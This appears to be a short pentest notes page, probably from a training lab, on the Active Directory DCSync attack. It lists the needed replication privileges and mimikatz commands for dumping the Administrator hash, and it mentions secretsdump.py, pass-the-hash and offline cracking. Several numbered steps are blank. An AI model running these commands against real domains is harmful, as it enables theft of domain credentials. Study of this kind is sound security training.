githubEdit

DCSync

Credentials to look for:

1) Local admin rights on several machines

2) Service accounts that have delegate permissions

3) Accounts used for privileged AD Services (SCCM,WSUS,Exchange,etc.)

1)

mimikatz

2)

lsadump::dcsync /domain:DOMAIN /user:OUR_LOW-PRIVILEGE_AD_USERNAME

Privileges: Replicate Directory Changes, Replicate Directory Changes All, Replicated Directory Changes in Filtered Set

Usually, Administrators, Domain Admins and Enterprise Admins have this privilege in their accounts.

1)

mimikatz.exe

2)

privilege::debug

3)

DCSync every single account

1)

2)

3)

4)

5) Download file

6)

7)

8) Offline password cracking / Pass-theHash (Mimikatz)

DCSync Remote

Secretsdump.py on an account that is synced with the domain controller to dump hashes to PtH attack.

1)

2)

3)

DCSync

Command
Description

runas /user:eagle\rocky cmd.exe

Start a new instance of cmd.exe as the user eagle\rocky.

mimikatz.exe

Tool used to implement the DCsync attack

lsadump::dcsync /domain:eagle.local /user:Administrator

Command used in mimikatz to DCSync and dump the Administrator password hash

Last updated